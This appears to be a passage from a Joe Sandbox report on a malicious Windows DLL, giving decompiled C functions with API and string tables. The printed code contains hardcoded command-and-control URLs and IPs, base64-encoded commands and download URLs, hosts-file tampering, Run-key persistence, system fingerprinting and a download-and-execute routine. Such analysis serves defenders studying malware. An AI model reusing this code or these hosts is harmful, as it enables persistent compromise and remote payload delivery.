            				_t71 = _t50;
            				while(1) {
            					_v1808 = _v1808 & 0x00000000;
            					memset( &_v1807, 0, 0xff << 2);
            					_v784 = _v784 & 0x00000000;
            					asm("stosw");
            					asm("stosb");
            					_t78 = 0x3f;
            					_t94 =  &_v783;
            					memset(_t94, 0, 0 << 2);
            					_t104 = _t102 + 0x18;
            					_t95 = _t94 + _t78;
            					asm("stosw");
            					asm("stosb");
            					_t56 = E10005C4C( &_v784, 0x100);
            					_t107 = _t56;
            					_pop(_t81);
            					if(_t56 == 0) {
            						_push("http://107.163.56.232:18963/main.php");
            					} else {
            						_push( &_v784);
            					}
            					_push("%s");
            					_push( &_v1808);
            					E10003EF4();
            					_push(0x80000);
            					_push(0);
            					E1000CCFC(_t71, _t81, 0x80000, _t98, _t107, _t71);
            					_t61 = E100061BD(_t81, 0x80000, _t107, _t109,  &_v1808, _t71, 0x80000);
            					_t102 = _t104 + 0x24;
            					_v8 = _t61;
            					if(_t61 > 7) {
            						goto L6;
            					}
            					L5:
            					Sleep( *0x10012500);
            					continue;
            					L6:
            					_t82 = 0;
            					__eflags = _t61;
            					if(_t61 <= 0) {
            						L11:
            						__eflags = E1000CD02(_t82, 0x80000) - 0x10;
            						_t83 = _t71;
            						if(__eflags <= 0) {
            							_t95 = 0x10016ae0;
            							_push(_t71);
            							__eflags = E1000CDF2(0x80000);
            							_t83 = 0x10016ae0;
            							if(__eflags != 0) {
            								wsprintfA(0x10016ae0, "%s", _t71);
            								_t102 = _t102 + 0xc;
            							}
            						}
            						E1000721F(_t71, _t83, _t86, _t95, 0x80000, __eflags, _t109);
            						_t102 = _t102 + 0xc;
            						0x1004303b(0x80000, E10001000(_t83, __eflags, _t109, "Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM="), 0, 0, "127.0.0.1", "8.8.8.8");
            						goto L5;
            					} else {
            						goto L7;
            					}
            					do {
            						L7:
            						_t67 = _t82;
            						asm("cdq");
            						_t95 = 2;
            						_t86 = _t67 % _t95;
            						__eflags = _t67 % _t95;
            						if(_t67 % _t95 == 0) {
            							_t32 = _t82 + _t71;
            							 *_t32 =  *(_t82 + _t71) + 0x4b;
            							__eflags =  *_t32;
            						} else {
            							 *(_t82 + _t71) =  *(_t82 + _t71) + 0x3a;
            						}
            						_t82 = _t82 + 1;
            						__eflags = _t82 - _v8;
            					} while (_t82 < _v8);
            					goto L11;
            				}
            			}































            0x10008286
            0x10008294
            0x1000829b
            0x1000829d
            0x100082a6
            0x100082a8
            0x100082b8
            0x100082ba
            0x100082bc
            0x100082ca
            0x100082d4
            0x100082e0
            0x100082e8
            0x100082f7
            0x1000830a
            0x1000830f
            0x10008312
            0x10008314
            0x10008314
            0x10008328
            0x1000832a
            0x10008333
            0x10008335
            0x10008336
            0x10008339
            0x10008344
            0x10008344
            0x10008344
            0x10008346
            0x10008348
            0x10008350
            0x10008356
            0x10008358
            0x10008359
            0x10008364
            0x1000835b
            0x10008361
            0x10008361
            0x1000836f
            0x10008374
            0x10008375
            0x1000837d
            0x1000837e
            0x10008381
            0x1000838f
            0x10008394
            0x1000839a
            0x1000839d
            0x00000000
            0x00000000
            0x1000839f
            0x100083a5
            0x00000000
            0x100083b0
            0x100083b0
            0x100083b2
            0x100083b4
            0x100083d2
            0x100083d8
            0x100083db
            0x100083dc
            0x100083de
            0x100083e3
            0x100083eb
            0x100083ed
            0x100083ee
            0x100083f7
            0x100083fd
            0x100083fd
            0x100083ee
            0x1000840c
            0x10008411
            0x10008423
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x100083b6
            0x100083b6
            0x100083b6
            0x100083ba
            0x100083bb
            0x100083bc
            0x100083be
            0x100083c0
            0x100083c8
            0x100083c8
            0x100083c8
            0x100083c2
            0x100083c2
            0x100083c2
            0x100083cc
            0x100083cd
            0x100083cd
            0x00000000
            0x100083b6

            APIs
            • LdrInitializeThunk.NTDLL ref: 100082E8
            • LdrInitializeThunk.NTDLL ref: 100082FF
            • Sleep.KERNEL32(00080000,00000000,00000000), ref: 100083A5
            • wsprintfA.USER32 ref: 100083F7
            Strings
            • http://107.163.56.232:18963/main.php, xrefs: 10008364
            • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008416
            • 8.8.8.8, xrefs: 10008400
            • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082D6
            • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082ED
            • 127.0.0.1, xrefs: 10008405
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitializeThunk$Sleepwsprintf
            • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
            • API String ID: 2795264321-515792873
            • Opcode ID: dd95a7da35bc16e265faba6e3e4d4fb2f7900b585253cfcdefab1353bf6a680d
            • Instruction ID: 307e7fa5ef9b1f310a37dbdaab843115ee1a86e3901deb50f67a69e2b05b1656
            • Opcode Fuzzy Hash: dd95a7da35bc16e265faba6e3e4d4fb2f7900b585253cfcdefab1353bf6a680d
            • Instruction Fuzzy Hash: 394106B6D042597AF721D364CC46FCB7B6CEB443C0F2040A5F248B9086DAB4BB858F55
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 56%
            			E1000570F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
            				void _v67;
            				char _v68;
            				void _v327;
            				char _v328;
            				char _v587;
            				char _v588;
            				void _v4683;
            				signed char _v4684;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t47;
            				void* _t48;
            				void* _t49;
            				signed int _t52;
            				signed int _t56;
            				void* _t58;
            				void* _t67;
            				void* _t71;
            				void* _t79;
            
            				_t79 = __eflags;
            				_t60 = __edx;
            				_t51 = __ecx;
            				E1000CD20(0x1248, __ecx);
            				E100051D3(_t51, __edx, _t79, __fp0);
            				_v68 = _v68 & 0x00000000;
            				_t52 = 0xf;
            				memset( &_v67, 0, _t52 << 2);
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v68, "%s\\%s", 0x100165a4, 0x100165a8);
            				_v4684 = _v4684 & 0x00000000;
            				memset( &_v4683, 0, 0x3ff << 2);
            				asm("stosw");
            				asm("stosb");
            				E10005318(0, _t79,  &_v4684);
            				_v328 = _v328 & 0x00000000;
            				_t56 = 0x40;
            				_v588 = _v588 & 0x00000000;
            				memset( &_v327, 0, _t56 << 2);
            				asm("stosw");
            				asm("stosb");
            				_t58 = 0x40;
            				_t67 =  &_v587;
            				memset(_t67, 0, 0 << 2);
            				_t68 = _t67 + _t58;
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v328, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
            				wsprintfA( &_v588, "c:\\windows\\system32\\drivers\\%s\\%s", 0x100165a4, 0x100165a8);
            				0x10038f08( &_v328, 0);
            				asm("insd");
            				E1000443D( &_v4684, 0x100165a4, 0, _t60,  &_v4684,  &_v588);
            				_push(L"Win32_process");
            				_push(L"ROOT\\CIMv2");
            				 *0x10015fd4 = 0;
            				_t47 = E10004D36(0x100165a4, 0, _t60, _t67 + _t58, 0, _t79, __fp0);
            				_t80 = _t47;
            				if(_t47 != 0) {
            					_push(_t47);
            					_push(0);
            					_t47 = E10029564(_t47, _t60, _t68, _t80, _t71, 0x1f0fff);
            					 *0x10015ff4 = _t47;
            					if(_t47 != 0) {
            						_t48 =  *0x10015fd8; // 0x0
            						 *_t48 = 0;
            						_t49 = CreateThread(0, 0, E10005620,  *0x10015fd8, 0, 0);
            						 *0x10015fd4 =  *0x10015fd4 + 1;
            						return _t49;
            					}
            				}
            				return _t47;
            			}
























            0x1000570f
            0x1000570f
            0x1000570f
            0x10005717
            0x1000571f
            0x10005724
            0x1000572a
            0x10005736
            0x10005738
            0x10005744
            0x1000574f
            0x10005751
            0x10005765
            0x10005767
            0x10005769
            0x10005771
            0x10005776
            0x1000577f
            0x10005788
            0x1000578f
            0x10005791
            0x10005793
            0x10005798
            0x10005799
            0x1000579f
            0x1000579f
            0x100057a1
            0x100057a3
            0x100057b1
            0x100057c5
            0x100057d4
            0x100057d9
            0x100057e8
            0x100057ed
            0x100057f2
            0x100057f7
            0x100057fd
            0x10005805
            0x10005807
            0x10005809
            0x1000580a
            0x10005811
            0x10005818
            0x1000581d
            0x1000581f
            0x10005826
            0x10005835
            0x1000583b
            0x00000000
            0x1000583b
            0x1000581d
            0x10005845

            APIs
            • wsprintfA.USER32 ref: 1000574F
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000537D
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000538A
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 10005393
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 100053A0
            • wsprintfA.USER32 ref: 100057B1
            • wsprintfA.USER32 ref: 100057C5
            • PrintFile.ABC(?,?,?,00000000,?,?,?,?,?,?,?,10016AE0,00000000,00080000,?,1000721D), ref: 100057E8
            • CreateThread.KERNEL32(00000000,00000000,10005620,00000000,00000000), ref: 10005835
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitializeThunk$wsprintf$CreateFilePrintThread
            • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
            • API String ID: 2056782399-1421401311
            • Opcode ID: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
            • Instruction ID: e048b07faf1ac040a4fa8706c71f0fbcae81103e39d27b5d28515d44bb65aaec
            • Opcode Fuzzy Hash: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
            • Instruction Fuzzy Hash: ED31A773910238BBEB21D7A4CC44FCF7B6DEB08746F1405A2F708FA051DB71AA858A91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 33%
            			E10005989(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, void* __fp0, intOrPtr _a16, intOrPtr _a20, signed int _a28) {
            				intOrPtr _t17;
            				void* _t20;
            				intOrPtr* _t39;
            
            				_t50 = __eflags;
            				_t32 = __edx;
            				_t27 = __ecx;
            				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
            				_push(__ecx);
            				_push(__ebx);
            				_push(__ebp);
            				_push(__esi);
            				_push(__edi);
            				wsprintfA(0x100165b0, "%s", "12071239");
            				0x10031e13();
            				 *_t34(0, 0x100165c8, 0x104);
            				 *_t34( *0x10016adc, 0x100166cc, 0x104);
            				E1000CD0E(_t27, 0x100167d0);
            				0x100426e9(0x100166cc);
            				asm("arpl [eax+0x57530020], ax");
            				wsprintfA(0x100168d4, "%s\\%s", 0x100167d0, 0x5c);
            				wsprintfA(0x100169d8, "%s\\version.txt", 0x100167d0);
            				_t17 = E1000CCAE(wsprintfA("F896SD5DAE", "M%s", "107.163.56.251:6658"), "12071239", _t27, _t32, 0x100167d0,  *0x1000e248, 0x100166cc, _t50, __fp0, 0x84);
            				_a16 = _t17;
            				_a28 = _a28 & 0x00000000;
            				_t51 = _t17;
            				if(_t17 == 0) {
            					_t39 = 0;
            					__eflags = 0;
            				} else {
            					_t27 = _t17;
            					_t39 = E10008A6A("12071239", _t17, _t32, _t51, __fp0);
            				}
            				_a28 = _a28 | 0xffffffff;
            				_t6 = _t39 + 0x44; // 0x44
            				E1000CD0E(_t27, 0x10016af0);
            				if(_t39 != 0) {
            					 *((intOrPtr*)( *_t39))(1);
            				}
            				_t20 = 1;
            				 *[fs:0x0] = _a20;
            				return _t20;
            			}






            0x10005989
            0x10005989
            0x10005989
            0x1000598e
            0x10005993
            0x10005994
            0x10005995
            0x10005996
            0x100059a2
            0x100059ae
            0x100059b1
            0x100059c6
            0x100059d5
            0x100059de
            0x100059e6
            0x100059eb
            0x100059fb
            0x10005a08
            0x10005a20
            0x10005a28
            0x10005a2c
            0x10005a31
            0x10005a33
            0x10005a40
            0x10005a40
            0x10005a35
            0x10005a35
            0x10005a3c
            0x10005a3c
            0x10005a42
            0x10005a47
            0x10005a50
            0x10005a59
            0x10005a61
            0x10005a61
            0x10005a69
            0x10005a6e
            0x10005a76

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: wsprintf
            • String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12071239$F896SD5DAE$M%s
            • API String ID: 2111968516-4006945637
            • Opcode ID: c285b52f04845b3a5ddf97e236d1c823dd400fbe2074583f7b88738120a81b70
            • Instruction ID: 79abf1e2baf1fb729ca166858087dd68efaefcd5263c4161144b64841660d7f9
            • Opcode Fuzzy Hash: c285b52f04845b3a5ddf97e236d1c823dd400fbe2074583f7b88738120a81b70
            • Instruction Fuzzy Hash: 741136366003287BF210E7959C45F6F7F5CDF896A6F01412AF700AE181DB72E8808B66
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
            • API String ID: 2994545307-1569318151
            • Opcode ID: 6495203b3a7a723168cc2296d43cec07435a7eea9f24a85f0b27764c02e7c442
            • Instruction ID: 60b119b73ed59b85f20aa855cf1e8ee1c5a7c8f5b848a72e73bb8641c22c9667
            • Opcode Fuzzy Hash: 6495203b3a7a723168cc2296d43cec07435a7eea9f24a85f0b27764c02e7c442
            • Instruction Fuzzy Hash: 8C316FB690065CBAEB11DBA4CC45FDF7F7DEF08341F4400A6F208AA181E7316A458EA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 62%
            			E10005DB4(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
            				char _v3;
            				char _v8;
            				intOrPtr _v12;
            				char _v16;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				char _v80;
            				void _v128;
            				void _v383;
            				signed char _v384;
            				char _v644;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				void* _t31;
            				void* _t44;
            				signed short _t49;
            				void* _t54;
            				signed int _t59;
            				void* _t62;
            				void* _t63;
            				signed int _t64;
            				void* _t67;
            				void* _t70;
            				intOrPtr _t71;
            				void* _t74;
            				void* _t77;
            				intOrPtr _t78;
            				char* _t81;
            				void* _t88;
            
            				_t88 = __eflags;
            				_t70 = __edx;
            				_t59 = 0xc;
            				_t77 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0";
            				_t31 = memcpy( &_v128, _t77, _t59 << 2);
            				_t74 = _t77 + _t59 + _t59;
            				0x10032624(0x80000002,  &_v128, 0, 0xf003f,  &_v8);
            				asm("sbb [ebp-0x72b68a40], al");
            				_t81 =  &_v3;
            				asm("clc");
            				_v16 = 4;
            				_v12 = 0xc8;
            				E1000409D(_v8, "ProcessorNameString", 0,  &_v16,  &_v644, _t31);
            				E10004092(_v8);
            				_t78 = _a4;
            				_push( &_v644);
            				E1000CD0E(0, _t78);
            				E100058A4(0, _t78);
            				_t13 = _t78 + 0x60; // 0x128
            				E10005ACA(_t88, _t13);
            				_pop(_t62);
            				_v80 = 0x40;
            				E1002BB01( &_v80, __ebx, _t62, _t70, _t74, _t78, _t88);
            				_t71 = _v68;
            				_t63 = 0x14;
            				_t44 = E1000CDB0(_v72, _t63, _t71);
            				asm("adc edx, 0x0");
            				_t18 = _t78 + 0x40; // 0x108
            				E10003EF4(_t18, "%u MB", _t44 + 1);
            				_t19 = _t78 + 0x80; // 0x148
            				_t49 = E1000CD0E(_t63, _t19);
            				0x1003e508("12071239", _t71, _t81,  &_v80);
            				_v384 = _v384 & 0x00000000;
            				 *(_t78 + 0x120) = _t49 & 0x0000ffff;
            				_t64 = 0x3f;
            				memset( &_v383, 0, _t64 << 2);
            				 *(_t78 + 0x124) =  *(_t78 + 0x124) | 0xffffffff;
            				asm("stosw");
            				asm("stosb");
            				_t54 = E10005CF7( &_v384, 0x100);
            				_t67 = _t81;
            				if(_t54 == 0) {
            					__eflags = _t78 + 0xa0;
            					return E10003EF4(_t78 + 0xa0, "%s", "http://107.163.56.232:18963/main.php");
            				}
            				_push( &_v384);
            				return E1000CD0E(_t67, _t78 + 0xa0);
            			}

































            0x10005db4
            0x10005db4
            0x10005dc4
            0x10005dc5
            0x10005dd9
            0x10005dd9
            0x10005de0
            0x10005de5
            0x10005deb
            0x10005dec
            0x10005ded
            0x10005e07
            0x10005e11
            0x10005e19
            0x10005e1e
            0x10005e27
            0x10005e29
            0x10005e44
            0x10005e49
            0x10005e4d
            0x10005e56
            0x10005e57
            0x10005e60
            0x10005e68
            0x10005e6d
            0x10005e6e
            0x10005e76
            0x10005e7b
            0x10005e84
            0x10005e89
            0x10005e95
            0x10005e9e
            0x10005ea3
            0x10005eaf
            0x10005eb5
            0x10005ebe
            0x10005ec0
            0x10005ecc
            0x10005ece
            0x10005ed6
            0x10005ede
            0x10005edf
            0x10005efd
            0x00000000
            0x10005f0e
            0x10005eed
            0x00000000

            APIs
            • ___crtGetTimeFormatEx.LIBCMT ref: 10005E11
              • Part of subcall function 1000409D: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040B2
              • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10006DCF,?), ref: 10004096
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CloseFormatQueryTimeValue___crt
            • String ID: %u MB$12071239$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
            • API String ID: 271660946-279254293
            • Opcode ID: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
            • Instruction ID: 4b44d42b6dd2e917ab233586d3a99f6710c87f88ea92407307b6f82172be36f0
            • Opcode Fuzzy Hash: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
            • Instruction Fuzzy Hash: 2531C2B680460CBAFB21C764DC42FDF77BCEB04340F14456AF658BA082EB75BA498B55
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E10008578(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				short _v32;
            				CHAR* _v72;
            				void _v76;
            				char _v80;
            				char _v96;
            				void _v355;
            				char _v356;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t20;
            				void* _t22;
            				void* _t24;
            				void* _t35;
            				void* _t36;
            				void* _t38;
            				signed int _t39;
            				signed int _t41;
            				void* _t43;
            				void* _t51;
            				void* _t57;
            
            				_t57 = __eflags;
            				_t43 = __edx;
            				_t38 = __ecx;
            				Sleep(0x2710);
            				_v12 = E10001000(_t38, _t57, __fp0, "aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=");
            				_t20 = E1000CCAE(_t19, _t36, _t38, _t43,  *0x1000e0b0, 0x300000, _t51, _t57, __fp0, 0x300000);
            				_push(0x300000);
            				_push(0);
            				_v8 = _t20;
            				E1000CCFC(0, _t38, 0x300000, _t51, _t57, _t20);
            				_t22 = E100061BD(_t38, 0x300000, _t57, __fp0, _v12, _v8, 0x300000);
            				_t50 = _t22;
            				if(_t22 <= 0) {
            					L1:
            					Sleep(0x1b7740);
            					goto L1;
            				}
            				_t39 = 0x40;
            				_v356 = 0;
            				_t24 = memset( &_v355, 0, _t39 << 2);
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v356, "c:\\%d.log", E1002DBAC(_t24, 0, _t43,  &_v355 + _t39, _t50, __eflags, __fp0));
            				E10006840( &_v356, _t43,  &_v356, _v8, _t50);
            				__eflags = 0;
            				_t41 = 0x10;
            				memset( &_v76, 0, _t41 << 2);
            				_v80 = 0x44;
            				_v72 = "wINsTA0\\dEFauLT";
            				_v32 = 0;
            				0x10036ac0(_t43, 0,  &_v356, 0, 0, 0, 0, 0, 0,  &_v80,  &_v96, 0);
            				_t35 = 1;
            				return _t35;
            			}



























            0x10008578
            0x10008578
            0x10008578
            0x1000858f
            0x100085a0
            0x100085a4
            0x100085ab
            0x100085ac
            0x100085ae
            0x100085b1
            0x100085bd
            0x100085c2
            0x100085c9
            0x100085cb
            0x100085d0
            0x00000000
            0x100085d0
            0x100085d8
            0x100085df
            0x100085e5
            0x100085e7
            0x100085e9
            0x100085fd
            0x1000860e
            0x10008616
            0x1000861d
            0x1000861e
            0x10008623
            0x1000863d
            0x10008644
            0x10008649
            0x10008650
            0x10008655

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep$wsprintf
            • String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log$wINsTA0\dEFauLT
            • API String ID: 3195947292-2583752392
            • Opcode ID: 0810fa4d6b71a50b45236c33566878f9762d6c774f759de78f1c08ccf4ee19d6
            • Instruction ID: 80da11c417ec69a2b6a76b4d39b24a6af7efd0caae81726e88516388cc332cb8
            • Opcode Fuzzy Hash: 0810fa4d6b71a50b45236c33566878f9762d6c774f759de78f1c08ccf4ee19d6
            • Instruction Fuzzy Hash: 0E21D5B6C0021CBAEB11EBE4CC42EDFBB7CEF48390F140466F604BA141DA716E458BA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 55%
            			E10006D08(void* __eflags, void* __fp0) {
            				char _v8;
            				char _v12;
            				void _v271;
            				char _v272;
            				void _v531;
            				char _v532;
            				void* __esi;
            				signed int _t34;
            				void* _t50;
            
            				_t50 = __eflags;
            				_t34 = 0x40;
            				_v532 = 0;
            				memset( &_v531, 0, _t34 << 2);
            				asm("stosw");
            				asm("stosb");
            				E10003FF7(0x100166cc,  &_v532, 0x104);
            				E1000406C(0x80000001, E10001000(0, _t50, __fp0, "U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg=="), 0, "REG_SZ", 0, 0xf003f, 0,  &_v8,  &_v12);
            				_push(0x40);
            				_v272 = 0;
            				memset( &_v271, 0, 0 << 2);
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v272, "%s \"%s\",Dispatch", 0x100165c8, 0x100166cc);
            				_push( &_v272);
            				E100040D4(_v8, "Disp", 0, 1,  &_v272, E1000CD02(0, 0x100166cc) + 1);
            				return E10004092(_v8);
            			}












            0x10006d08
            0x10006d18
            0x10006d21
            0x10006d2c
            0x10006d2e
            0x10006d30
            0x10006d3e
            0x10006d6c
            0x10006d71
            0x10006d7c
            0x10006d83
            0x10006d85
            0x10006d87
            0x10006d99
            0x10006da5
            0x10006dbf
            0x10006dd4

            APIs
              • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
              • Part of subcall function 1000406C: RegCreateKeyExA.ADVAPI32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D71,?,10006D71,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
            • wsprintfA.USER32 ref: 10006D99
            • ___crtGetTimeFormatEx.LIBCMT ref: 10006DBF
              • Part of subcall function 100040D4: RegSetValueExA.ADVAPI32(00000001,?,00000001,00000000,?,?,?,10006DC4,?,Disp,00000000,00000001,?,00000001,?), ref: 100040E9
              • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10006DCF,?), ref: 10004096
            Strings
            • REG_SZ, xrefs: 10006D55
            • U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D5B
            • Disp, xrefs: 10006DB7
            • %s "%s",Dispatch, xrefs: 10006D93
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
